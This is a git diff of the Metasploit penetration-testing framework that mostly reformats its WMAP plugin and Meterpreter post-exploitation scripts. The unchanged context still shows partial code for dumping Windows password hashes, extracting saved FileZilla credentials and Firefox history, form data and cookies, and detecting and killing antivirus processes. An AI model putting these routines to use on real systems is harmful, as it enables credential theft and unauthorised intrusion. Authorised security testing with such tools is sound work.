-
-
-
+
+
+
vhost = nil
-
+
# Allow the URL to be supplied as VHOST,URL if a custom VHOST
# should be used. This allows for things like:
# localhost,http://192.168.0.2/admin/
@@ -1281,24 +1281,24 @@ class Plugin::Wmap < Msf::Plugin
uri = URI.parse(url) rescue nil
if not uri
print_error("Could not understand URL: #{url}")
- return
+ return
end
if uri.scheme !~ /^https?/
print_error("Only http and https URLs are accepted: #{url}")
return
end
-
+
ssl = false
if uri.scheme == 'https'
ssl = true
end
-
+
site = self.framework.db.report_web_site(:wait => true, :host => uri.host, :port => uri.port, :vhost => vhost, :ssl => ssl)
return site
end
-
+
# Code by hdm. Modified two lines by et
#
def process_urls(urlstr)
@@ -1309,7 +1309,7 @@ class Plugin::Wmap < Msf::Plugin
urls.each do |url|
next if url.to_s.strip.empty?
vhost = nil
-
+
# Allow the URL to be supplied as VHOST,URL if a custom VHOST
# should be used. This allows for things like:
# localhost,http://192.168.0.2/admin/
@@ -1345,10 +1345,10 @@ class Plugin::Wmap < Msf::Plugin
return if target_whitelist.length == 0
self.targets = {}
-
+
target_whitelist.each do |ent|
vhost,target = ent
-
+
host = self.framework.db.workspace.hosts.find_by_address(target.host)
if not host
print_error("No matching host for #{target.host}")
@@ -1359,16 +1359,16 @@ class Plugin::Wmap < Msf::Plugin
print_error("No matching service for #{target.host}:#{target.port}")
next
end
-
- #puts "aaa"
- #puts framework.db.workspace.name
-
+
+ #print_status "aaa"
+ #print_status framework.db.workspace.name
+
#sites = serv.web_sites.find(:all, :conditions => ['vhost = ? or vhost = ?', vhost, host.address])
-
+
sites = serv.web_sites.find(:all)
-
+
sites.each do |site|
-
+
#site.web_forms.find_all_by_path(target.path).each do |form|
ckey = [ site.vhost, host.address, serv.port, target.path].join("|")
if not self.targets[ckey]
@@ -1389,23 +1389,23 @@ class Plugin::Wmap < Msf::Plugin
end
end
end
-
+
def view_site_tree(urlstr, md, ld)
-
+
site_whitelist = []
urls = urlstr.to_s.split(/\s+/)
urls.each do |url|
next if url.to_s.strip.empty?
vhost = nil
-
+
# Allow the URL to be supplied as VHOST,URL if a custom VHOST
# should be used. This allows for things like:
# localhost,http://192.168.0.2/admin/
if url !~ /^http/
vhost,url = url.split(",", 2)
-
+
if url.to_s.empty?
url = vhost
vhost = nil
@@ -1435,10 +1435,10 @@ class Plugin::Wmap < Msf::Plugin
return if site_whitelist.length == 0
vsites = {}
-
+
site_whitelist.each do |ent|
vhost,target = ent
-
+
host = self.framework.db.workspace.hosts.find_by_address(target.host)
if not host
print_error("No matching host for #{target.host}")
@@ -1449,14 +1449,14 @@ class Plugin::Wmap < Msf::Plugin
print_error("No matching service for #{target.host}:#{target.port}")
next
end
-
- #puts "aaa"
- #puts framework.db.workspace.name
-
+
+ #print_status "aaa"
+ #print_status framework.db.workspace.name
+
sites = serv.web_sites.find(:all, :conditions => ['vhost = ? or vhost = ?', vhost, host.address])
-
+
#sites = serv.web_sites.find(:all)
-
+
sites.each do |site|
#site.vhost
#site.web_forms.find_all_by_path(target.path).each do |form|
@@ -1466,18 +1466,18 @@ class Plugin::Wmap < Msf::Plugin
end
end
end
-
+
#
# Load website structure into a tree
#
def load_tree(s)
-
+
pathchr = '/'
-
+
wtree = Tree.new(s.vhost)
- # Load site pages
+ # Load site pages
s.web_pages.find(:all, :order => 'path').each do |req|
tarray = req.path.to_s.split(pathchr)
tarray.delete("")
@@ -1487,7 +1487,7 @@ class Plugin::Wmap < Msf::Plugin
tpath = tpath + Pathname.new(df.to_s)
end
end
-
+
# Load site forms
s.web_forms.each do |req|
tarray = req.path.to_s.split(pathchr)
@@ -1498,42 +1498,42 @@ class Plugin::Wmap < Msf::Plugin
tpath = tpath + Pathname.new(df.to_s)
end
end
-
+
return wtree
end
#
# Print Tree structure. Still ugly
#
-
+
def print_tree(tree, maxlevel, limitlevel)
initab = " " * 4
indent = 6
if tree != nil and tree.depth <= maxlevel
print initab + (" " * indent * tree.depth)
if tree.depth > 0
- print "|"+("-" * (indent-1))+"/"
+ print "|"+("-" * (indent-1))+"/"
end
- if tree.depth >= 0
+ if tree.depth >= 0
if tree.depth == 0
- print "[#{tree.name}]\n"+initab+(" " * indent)+"|\n"
-
+ print "[#{tree.name}]\n"+initab+(" " * indent)+"|\n"
+
else
c = tree.children.count
if c > 0
print tree.name + " (" + c.to_s+")\n"
else
print tree.name + "\n"
- end
+ end
end
end
-
+
tree.children.each_pair do |name,child|
print_tree(child,maxlevel,limitlevel)
end
end
end
-
+
#def print_tree(tree)
# if tree.is_leaf? and tree.depth > 0
@@ -1545,7 +1545,7 @@ class Plugin::Wmap < Msf::Plugin
# print_tree(child)
# end
#end
-
+
end
class WebTarget < ::Hash
@@ -1554,10 +1554,10 @@ class Plugin::Wmap < Msf::Plugin
"#{proto}://#{self[:host]}:#{self[:port]}#{self[:path]}"
end
end
-
+
def initialize(framework, opts)
super
-
+
wmapversion = '1.0'
wmapbanner = "[WMAP #{wmapversion}] === et [ ] metasploit.com 2011"
diff --git a/plugins/xmlrpc.rb b/plugins/xmlrpc.rb
index 999a0afa0e..52518cb899 100644
--- a/plugins/xmlrpc.rb
+++ b/plugins/xmlrpc.rb
@@ -138,7 +138,7 @@ class Plugin::XMLRPC < Msf::Plugin
self.server.add_handler(::XMLRPC::iPIMethods("plugin"),
::Msf::RPC::Plugin.new(*args)
)
-
+
# Set the default/catch-all handler
self.server.set_default_handler do |name, *args|
raise ::XMLRPC::FaultException.new(-99, "Method #{name} missing or wrong number of parameters!")
diff --git a/scripts/meterpreter/arp_scanner.rb b/scripts/meterpreter/arp_scanner.rb
index fbcda589e0..cab09e016e 100644
--- a/scripts/meterpreter/arp_scanner.rb
+++ b/scripts/meterpreter/arp_scanner.rb
@@ -25,6 +25,7 @@ def enum_int
end
end
+
def arp_scan(cidr)
print_status("ARP Scanning #{cidr}")
ws = client.railgun.ws2_32
@@ -42,27 +43,20 @@ def arp_scan(cidr)
end
iplst.each do |ip_text|
if i < 10
- a.push(::Thread.new {
+ a.push(::Thread.new {
h = ws.inet_addr(ip_text)
ip = h["return"]
h = iphlp.SendARP(ip,0,6,6)
if h["return"] == client.railgun.const("NO_ERROR")
- mac = h["pMacAddr"]
- print_status("IP: #{ip_text} MAC " +
- mac[0].ord.to_s(16) + ":" +
- mac[1].ord.to_s(16) + ":" +
- mac[2].ord.to_s(16) + ":" +
- mac[3].ord.to_s(16) + ":" +
- mac[4].ord.to_s(16) + ":" +
- mac[5].ord.to_s(16)
- )
+ mac_text = h["pMacAddr"].unpack('C*').map { |e| "%02x" % e }.join(':')
+ print_status("IP: #{ip_text} MAC #{mac_text}")
found << "#{ip_text}\n"
end
})
- i += 1
+ i += 1
else
- sleep(0.05) and a.delete_if {|x| not x.alive?} while not a.empty?
- i = 0
+ sleep(0.05) and a.delete_if {|x| not x.alive?} while not a.empty?
+ i = 0
end
end
a.delete_if {|x| not x.alive?} while not a.empty?
@@ -118,4 +112,4 @@ if client.platform =~ /win32|win64/
else
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
-end
\ No newline at end of file
+end
diff --git a/scripts/meterpreter/autoroute.rb b/scripts/meterpreter/autoroute.rb
index 55aaaecaad..8fa695edd7 100644
--- a/scripts/meterpreter/autoroute.rb
+++ b/scripts/meterpreter/autoroute.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
#
# Meterpreter script for setting up a route from within a
diff --git a/scripts/meterpreter/checkvm.rb b/scripts/meterpreter/checkvm.rb
index 1c2373636c..8f5b68c8cb 100644
--- a/scripts/meterpreter/checkvm.rb
+++ b/scripts/meterpreter/checkvm.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
# Meterpreter script for detecting if target host is a Virtual Machine
# Provided by Carlos Perez at carlos_perez[at]darkoperator.com
# Version: 0.2.0
@@ -20,37 +21,38 @@ session = client
# Function for detecting if it is a Hyper-V VM
def hypervchk(session)
- begin
- vm = false
- key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft', KEY_READ)
- sfmsvals = key.enum_key
- if sfmsvals.include?("Hyper-V")
- print_status("This is a Hyper-V Virtual Machine")
- vm = true
- elsif sfmsvals.include?("VirtualMachine")
- print_status("This is a Hyper-V Virtual Machine")
- vm = true
- end
- key.close
- rescue
- end
- if not vm
- begin
- key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SYSTEM\ControlSet001\Services', KEY_READ)
- srvvals = key.enum_key
- if srvvals.include?("vmicheartbeat")
+ begin
+ vm = false
+ key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft', KEY_READ)
+ sfmsvals = key.enum_key
+ if sfmsvals.include?("Hyper-V")
print_status("This is a Hyper-V Virtual Machine")
vm = true
- elsif srvvals.include?("vmicvss")
- print_status("This is a Hyper-V Virtual Machine")
- vm = true
- elsif srvvals.include?("vmicshutdown")
- print_status("This is a Hyper-V Virtual Machine")
- vm = true
- elsif srvvals.include?("vmicexchange")
+ elsif sfmsvals.include?("VirtualMachine")
print_status("This is a Hyper-V Virtual Machine")
vm = true
end
+ key.close
+ rescue
+ end
+
+ if not vm
+ begin
+ key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SYSTEM\ControlSet001\Services', KEY_READ)
+ srvvals = key.enum_key
+ if srvvals.include?("vmicheartbeat")
+ print_status("This is a Hyper-V Virtual Machine")
+ vm = true
+ elsif srvvals.include?("vmicvss")
+ print_status("This is a Hyper-V Virtual Machine")
+ vm = true
+ elsif srvvals.include?("vmicshutdown")
+ print_status("This is a Hyper-V Virtual Machine")
+ vm = true
+ elsif srvvals.include?("vmicexchange")
+ print_status("This is a Hyper-V Virtual Machine")
+ vm = true
+ end
rescue
end
end
@@ -81,11 +83,11 @@ def vmwarechk(session)
end
if not vm
begin
- key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0')
- if key.query_value('Identifier').data.downcase =~ /vmware/
- print_status("This is a VMware Virtual Machine")
- vm = true
- end
+ key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0')
+ if key.query_value('Identifier').data.downcase =~ /vmware/
+ print_status("This is a VMware Virtual Machine")
+ vm = true
+ end
rescue
end
end
diff --git a/scripts/meterpreter/credcollect.rb b/scripts/meterpreter/credcollect.rb
index 5752aafb12..5cf971a954 100644
--- a/scripts/meterpreter/credcollect.rb
+++ b/scripts/meterpreter/credcollect.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
# credcollect - tebo[at]attackresearch.com
opts = Rex::Parser::Arguments.new(
diff --git a/scripts/meterpreter/domain_list_gen.rb b/scripts/meterpreter/domain_list_gen.rb
index 8eed32031d..4ca6eaf5be 100644
--- a/scripts/meterpreter/domain_list_gen.rb
+++ b/scripts/meterpreter/domain_list_gen.rb
@@ -32,20 +32,20 @@ host = @client.sys.config.sysinfo['Computer']
current_user = @client.sys.config.getuid.scan(/\S*\\(.*)/)
def reg_getvaldata(key,valname)
- value = nil
- begin
- root_key, base_key = @client.sys.registry.splitkey(key)
- open_key = @client.sys.registry.open_key(root_key, base_key, KEY_READ)
- v = open_key.query_value(valname)
- value = v.data
- open_key.close
- end
- return value
+ value = nil
+ begin
+ root_key, base_key = @client.sys.registry.splitkey(key)
+ open_key = @client.sys.registry.open_key(root_key, base_key, KEY_READ)
+ v = open_key.query_value(valname)
+ value = v.data
+ open_key.close
+ end
+ return value
end
domain = reg_getvaldata("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon","DefaultDomainName")
-if domain == ""
- print_error("domain not found")
+if domain == ""
+ print_error("domain not found")
end
# Create Filename info to be appended to downloaded files
diff --git a/scripts/meterpreter/duplicate.rb b/scripts/meterpreter/duplicate.rb
index 0895dd44b3..fb99634e8d 100644
--- a/scripts/meterpreter/duplicate.rb
+++ b/scripts/meterpreter/duplicate.rb
@@ -1,9 +1,9 @@
# $Id$
# $Revision$
# Author: Scriptjunkie
-# Uses a meterpreter session to spawn a new meterpreter session in a different process.
+# Uses a meterpreter session to spawn a new meterpreter session in a different process.
# A new process allows the session to take "risky" actions that might get the process killed by
-# A/V, giving a meterpreter session to another controller, or start a keylogger on another
+# A/V, giving a meterpreter session to another controller, or start a keylogger on another
# process.
#
@@ -83,7 +83,7 @@ if client.platform =~ /win32|win64/
server = client.sys.process.open
print_status("Current server process: #{server.name} (#{server.pid})")
-
+
if ! inject
exe = ::Msf::Util::EXE.to_win32pe(client.framework, raw)
print_status("Meterpreter stager executable #{exe.length} bytes long")
diff --git a/scripts/meterpreter/enum_chrome.rb b/scripts/meterpreter/enum_chrome.rb
index f988d074f9..7891bc6225 100644
--- a/scripts/meterpreter/enum_chrome.rb
+++ b/scripts/meterpreter/enum_chrome.rb
@@ -33,7 +33,7 @@ end
opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help menu" ],
- "-m" => [ false, "Migrate into explorer.exe"],
+ "-m" => [ false, "Migrate into explorer.exe"],
"-f" => [ true, "Output format: j[son], y[aml], t[ext]. Defaults to json"]
)
@@ -43,7 +43,7 @@ opts.parse(args) { |opt, idx, val|
@migrate = true
when "-f"
if val =~ /^j(son)?$/
- @output_format << "json"
+ @output_format << "json"
elsif val =~ /^y(aml)?$/
@output_format << "yaml"
elsif val =~ /^t(ext)?$/
@@ -71,10 +71,10 @@ if @output_format.include?("json")
require 'json'
rescue LoadError
print_error("JSON is not available.")
- @output_format.delete("json")
+ @output_format.delete("json")
if @output_format.empty?
print_status("Falling back to raw text output.")
- @output_format << "text"
+ @output_format << "text"
end
end
end
@@ -123,7 +123,7 @@ def write_output(file, rows)
::File.open(file + ".yml", "w") { |f| f.write(JSON.pretty_generate(rows)) }
end
if @output_format.include?("text")
- ::File.open(file + ".txt", "w") do |f|
+ ::File.open(file + ".txt", "w") do |f|
f.write(rows.first.keys.join("\t") + "\n")
f.write(rows.map { |e| e.values.map(&:inspect).join("\t") }.join("\n"))
end
diff --git a/scripts/meterpreter/enum_firefox.rb b/scripts/meterpreter/enum_firefox.rb
index 2900b1166c..0cc651fc97 100644
--- a/scripts/meterpreter/enum_firefox.rb
+++ b/scripts/meterpreter/enum_firefox.rb
@@ -1,6 +1,6 @@
#
# $Id: enum_firefox.rb 9770 2010-07-10 20:00:32Z darkoperator $
-# $Revision$
+# $Revision: $
# Author: Carlos Perez at carlos_perez[at]darkoperator.com
#-------------------------------------------------------------------------------
################## Variable Declarations ##################
@@ -52,24 +52,24 @@ def frfxdmp(usrnm)
cookies = []
formvals = ''
searches = ''
- results = ''
- placesdb = @logs + ::File::Separator + usrnm + "places.sqlite"
- formdb = @logs + ::File::Separator + usrnm + "formhistory.sqlite"
- searchdb = @logs + ::File::Separator + usrnm + "search.sqlite"
- cookiesdb = @logs + ::File::Separator + usrnm + "cookies.sqlite"
+ results = ''
+ placesdb = @logs + ::File::Separator + usrnm + "places.sqlite"
+ formdb = @logs + ::File::Separator + usrnm + "formhistory.sqlite"
+ searchdb = @logs + ::File::Separator + usrnm + "search.sqlite"
+ cookiesdb = @logs + ::File::Separator + usrnm + "cookies.sqlite"
bookmarks = @logs + ::File::Separator + usrnm + "_bookmarks.txt"
download_list = @logs + ::File::Separator + usrnm + "_download_list.txt"
url_history = @logs + ::File::Separator + usrnm + "_history.txt"
form_history = @logs + ::File::Separator + usrnm + "_form_history.txt"
search_history = @logs + ::File::Separator + usrnm + "_search_history.txt"
- begin
+ begin
print_status("\tGetting Firefox Bookmarks for #{usrnm}")
db = SQLite3::Database.new(placesdb)
#print_status("\tProcessing #{placesdb}")
db.execute('select a.url from moz_places a, moz_bookmarks b, '+
- 'moz_bookmarks_roots c where a.id=b.fk and parent=2'+
- ' and folder_id=2 and a.hidden=0')do |row|
+ 'moz_bookmarks_roots c where a.id=b.fk and parent=2'+
+ ' and folder_id=2 and a.hidden=0') do |row|
bkmrks << row
end
print_status("\tSaving to #{bookmarks}")
@@ -77,8 +77,8 @@ def frfxdmp(usrnm)
bkmrks.each do |b|
file_local_write(bookmarks,"\t#{b.to_s}\n")
end
- else
- print_status("\tIt appears that there are no bookmarks for this account")
+ else
+ print_status("\tIt appears that there are no bookmarks for this account")
end
rescue::Exception => e
print_status("The following Error was encountered: #{e.class} #{e}")
@@ -87,17 +87,17 @@ def frfxdmp(usrnm)
begin
print_status("\tGetting list of Downloads using Firefox made by #{usrnm}")
db.execute('SELECT url FROM moz_places, moz_historyvisits ' +
- 'WHERE moz_places.id = moz_historyvisits.place_id '+
- 'AND visit_type = "7" ORDER by visit_date') do |row|
+ 'WHERE moz_places.id = moz_historyvisits.place_id '+
+ 'AND visit_type = "7" ORDER by visit_date') do |row|
dnldsmade << row
end
- print_status("\tSaving Download list to #{download_list}")
+ print_status("\tSaving Download list to #{download_list}")
if dnldsmade.length != 0
dnldsmade.each do |d|
file_local_write(download_list,"\t#{d.to_s} \n")
end
- else
- print_status("\tIt appears that downloads where cleared for this account")
+ else
+ print_status("\tIt appears that downloads where cleared for this account")
end
rescue::Exception => e
print_status("The following Error was encountered: #{e.class} #{e}")
@@ -106,8 +106,8 @@ def frfxdmp(usrnm)
begin
print_status("\tGetting Firefox URL History for #{usrnm}")
db.execute('SELECT DISTINCT url FROM moz_places, moz_historyvisits ' +
- 'WHERE moz_places.id = moz_historyvisits.place_id ' +
- 'AND visit_type = "1" ORDER by visit_date' ) do |row|
+ 'WHERE moz_places.id = moz_historyvisits.place_id ' +
+ 'AND visit_type = "1" ORDER by visit_date' ) do |row|
sitesvisited << row
end
print_status("\tSaving URL History to #{url_history}")
@@ -115,8 +115,8 @@ def frfxdmp(usrnm)
sitesvisited.each do |s|
file_local_write(url_history,"\t#{s.to_s}\n")
end
- else
- print_status("\tIt appears that Browser History has been cleared")
+ else
+ print_status("\tIt appears that Browser History has been cleared")
end
db.close
rescue::Exception => e
@@ -130,11 +130,11 @@ def frfxdmp(usrnm)
db.execute("SELECT fieldname,value FROM moz_formhistory") do |row|
formvals << "\tField: #{row[0]} Value: #{row[1]}\n"
end
- print_status("\tSaving Firefox Form History to #{form_history}")
+ print_status("\tSaving Firefox Form History to #{form_history}")
if formvals.length != 0
file_local_write(form_history,formvals)
- else
- print_status("\tIt appears that Form History has been cleared")
+ else
+ print_status("\tIt appears that Form History has been cleared")
end
db.close
rescue::Exception => e
@@ -148,11 +148,11 @@ def frfxdmp(usrnm)
db.execute("SELECT name,value FROM engine_data") do |row|
searches << "\tField: #{row[0]} Value: #{row[1]}\n"
end
- print_status("\tSaving Firefox Search History to #{search_history}")
+ print_status("\tSaving Firefox Search History to #{search_history}")
if searches.length != 0
file_local_write(search_history,searches)
- else
- print_status("\tIt appears that Search History has been cleared")
+ else
+ print_status("\tIt appears that Search History has been cleared")
end
db.close
rescue::Exception => e
@@ -176,7 +176,7 @@ def frfxdmp(usrnm)
fd.puts "isHttpOnly: " + item[8].to_s + "\n"
fd.close
end
- return results
+ return results
end
#-------------------------------------------------------------------------------
#Function for getting password files
diff --git a/scripts/meterpreter/enum_powershell_env.rb b/scripts/meterpreter/enum_powershell_env.rb
index 0e516325ae..5ff53f199c 100644
--- a/scripts/meterpreter/enum_powershell_env.rb
+++ b/scripts/meterpreter/enum_powershell_env.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision: $
#Meterpreter script for enumerating Microsoft Powershell settings.
#Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
@client = client
diff --git a/scripts/meterpreter/enum_putty.rb b/scripts/meterpreter/enum_putty.rb
index d0c89614bc..76e7994e63 100644
--- a/scripts/meterpreter/enum_putty.rb
+++ b/scripts/meterpreter/enum_putty.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision: $
#
# Meterpreter script for enumerating putty connections
# Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
diff --git a/scripts/meterpreter/enum_vmware.rb b/scripts/meterpreter/enum_vmware.rb
index ceeeae8bcb..9fef542251 100644
--- a/scripts/meterpreter/enum_vmware.rb
+++ b/scripts/meterpreter/enum_vmware.rb
@@ -1,5 +1,6 @@
-# $Id$
+# $Id: $
# $Revision$
+
# Author: Carlos Perez at carlos_perez[at]darkoperator.com
#-------------------------------------------------------------------------------
################## Variable Declarations ##################
@@ -261,7 +262,7 @@ def enum_vihosupdt
begin
@client.fs.dir.foreach(u['userappdata']+"VIU\\hosts\\") do |vmdir|
next if vmdir =~ /^(\.|\.\.)$/
- print_status("\t#{vmdir}")
+ print_status("\t#{vmdir}")
end
rescue
end
diff --git a/scripts/meterpreter/event_manager.rb b/scripts/meterpreter/event_manager.rb
index ecaf97b22a..87480062ea 100644
--- a/scripts/meterpreter/event_manager.rb
+++ b/scripts/meterpreter/event_manager.rb
@@ -89,8 +89,7 @@ def print_log_details
tbl = Rex::Ui::Text::Table.new(
'Header' => "Event Logs on System",
'Indent' => 1,
- 'Columns' =>
- [
+ 'Columns' => [
"Name",
"Retention",
"Maximum Size",
diff --git a/scripts/meterpreter/get_application_list.rb b/scripts/meterpreter/get_application_list.rb
index 6b9cdad99a..bb0cd8fdfa 100644
--- a/scripts/meterpreter/get_application_list.rb
+++ b/scripts/meterpreter/get_application_list.rb
@@ -1,18 +1,18 @@
# $Id$
+# $Revision: $
# Meterpreter script for listing installed applications and their version.
# Provided: carlos_perez[at]darkoperator[dot]com
#Options and Option Parsing
opts = Rex::Parser::Arguments.new(
- "-h" => [ false, "Help menu." ]
+ "-h" => [ false, "Help menu." ]
)
def app_list
tbl = Rex::Ui::Text::Table.new(
'Header' => "Installed Applications",
'Indent' => 1,
- 'Columns' =>
- [
+ 'Columns' => [
"Name",
"Version"
])
@@ -49,13 +49,13 @@ def app_list
end
opts.parse(args) { |opt, idx, val|
- case opt
- when "-h"
- print_line "Meterpreter Script for extracting a list installed applications and their version."
- print_line(opts.usage)
- raise Rex::Script::Completed
-
- end
+ case opt
+ when "-h"
+ print_line "Meterpreter Script for extracting a list installed applications and their version."
+ print_line(opts.usage)
+ raise Rex::Script::Completed
+
+ end
}
if client.platform =~ /win32|win64/
app_list
diff --git a/scripts/meterpreter/get_env.rb b/scripts/meterpreter/get_env.rb
index 9c5dee59c5..ec7c8a199b 100644
--- a/scripts/meterpreter/get_env.rb
+++ b/scripts/meterpreter/get_env.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision: $
#-------------------------------------------------------------------------------
#Options and Option Parsing
opts = Rex::Parser::Arguments.new(
diff --git a/scripts/meterpreter/get_filezilla_creds.rb b/scripts/meterpreter/get_filezilla_creds.rb
index 60def76d46..f8213c1ee2 100644
--- a/scripts/meterpreter/get_filezilla_creds.rb
+++ b/scripts/meterpreter/get_filezilla_creds.rb
@@ -1,5 +1,6 @@
##
# $Id$
+# $Revision: $
##
require "rexml/document"
@@ -84,10 +85,10 @@ def extract_saved_creds(path,xml_file)
print_status "\tUser: #{e.elements["User"].text}"
creds << "User: #{e.elements["User"].text}"
print_status "\tPassword: #{e.elements["Pass"].text}"
- creds << "Password: #{e.elements["Pass"].text}"
+ creds << "Password: #{e.elements["Pass"].text}"
elsif logon_type =~ /2|3/
- print_status "\tUser: #{e.elements["User"].text}"
- creds << "User: #{e.elements["User"].text}"
+ print_status "\tUser: #{e.elements["User"].text}"
+ creds << "User: #{e.elements["User"].text}"
end
proto = e.elements["Protocol"].text
diff --git a/scripts/meterpreter/get_local_subnets.rb b/scripts/meterpreter/get_local_subnets.rb
index f52f5ee410..dec55fa353 100644
--- a/scripts/meterpreter/get_local_subnets.rb
+++ b/scripts/meterpreter/get_local_subnets.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
# Meterpreter script that display local subnets
# Provided by Nicob
@@ -22,9 +23,9 @@ end
}
client.net.config.each_route { |route|
- # Remove multicast and loopback interfaces
- next if route.subnet =~ /^(224\.|127\.)/
- next if route.subnet == '0.0.0.0'
- next if route.netmask == '255.255.255.255'
- print_line("Local subnet: #{route.subnet}/#{route.netmask}")
+ # Remove multicast and loopback interfaces
+ next if route.subnet =~ /^(224\.|127\.)/
+ next if route.subnet == '0.0.0.0'
+ next if route.netmask == '255.255.255.255'
+ print_line("Local subnet: #{route.subnet}/#{route.netmask}")
}
diff --git a/scripts/meterpreter/get_valid_community.rb b/scripts/meterpreter/get_valid_community.rb
old mode 100755
new mode 100644
index 76c6112074..b08df8b9de
--- a/scripts/meterpreter/get_valid_community.rb
+++ b/scripts/meterpreter/get_valid_community.rb
@@ -1,3 +1,6 @@
+# $Id$
+# $Revision$
+
#copied getvncpw - thanks grutz/carlos
session = client
diff --git a/scripts/meterpreter/getcountermeasure.rb b/scripts/meterpreter/getcountermeasure.rb
index e0406f1b12..ce0ad27824 100644
--- a/scripts/meterpreter/getcountermeasure.rb
+++ b/scripts/meterpreter/getcountermeasure.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
#
# Meterpreter script for detecting AV, HIPS, Third Party Firewalls, DEP Configuration and Windows Firewall configuration.
# Provides also the option to kill the processes of detected products and disable the built-in firewall.
@@ -111,9 +112,9 @@ avs = %W{
defwatch.exe
f-agnt95.exe
fpavupdm.exe
- f-prot95.exe
- f-prot.exe
- fprot.exe
+ f-prot95.exe
+ f-prot.exe
+ fprot.exe
fsaua.exe
fsav32.exe
f-sched.exe
@@ -121,7 +122,7 @@ avs = %W{
fsm32.exe
fsma32.exe
fssm32.exe
- f-stopw.exe
+ f-stopw.exe
f-stopw.exe
fwservice.exe
fwsrv.exe
diff --git a/scripts/meterpreter/gettelnet.rb b/scripts/meterpreter/gettelnet.rb
index 009fd967f5..a65c4120d0 100644
--- a/scripts/meterpreter/gettelnet.rb
+++ b/scripts/meterpreter/gettelnet.rb
@@ -40,7 +40,7 @@ end
def insttlntsrv()
trgtos = @client.sys.config.sysinfo['OS']
if trgtos =~ /Vista|7|2008/
- puts("Checking if Telnet Service is Installed")
+ print_status("Checking if Telnet Service is Installed")
if checkifinst()
print_status("Telnet Service Installed on Target")
else
@@ -52,7 +52,7 @@ def insttlntsrv()
@client.sys.process.get_processes().each do |x|
found =1
if prog2check == (x['name'].downcase)
- puts "*"
+ print_line "*"
sleep(0.5)
found = 0
end
diff --git a/scripts/meterpreter/hashdump.rb b/scripts/meterpreter/hashdump.rb
index 920630c2e5..5b88c13f4e 100644
--- a/scripts/meterpreter/hashdump.rb
+++ b/scripts/meterpreter/hashdump.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
#
# Implement pwdump (hashdump) through registry reads + syskey
@@ -30,22 +31,22 @@ opts.parse(args) { |opt, idx, val|
@sam_empty_nt = ["31d6cfe0d16ae931b73c59d7e0c089c0"].pack("H*")
@des_odd_parity = [
- 1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14,
- 16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31,
- 32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47,
- 49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62,
- 64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79,
- 81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94,
- 97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110,
- 112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127,
- 128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143,
- 145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158,
- 161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174,
- 176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191,
- 193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206,
- 208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223,
- 224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239,
- 241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254
+ 1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14,
+ 16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31,
+ 32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47,
+ 49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62,
+ 64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79,
+ 81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94,
+ 97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110,
+ 112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127,
+ 128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143,
+ 145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158,
+ 161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174,
+ 176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191,
+ 193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206,
+ 208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223,
+ 224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239,
+ 241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254
]
def capture_boot_key
@@ -86,7 +87,7 @@ def capture_hboot_key(bootkey)
rc4.key = hash.digest
hbootkey = rc4.update(vf[0x80, 32])
hbootkey << rc4.final
- return hbootkey
+ return hbootkey
end
def capture_user_keys
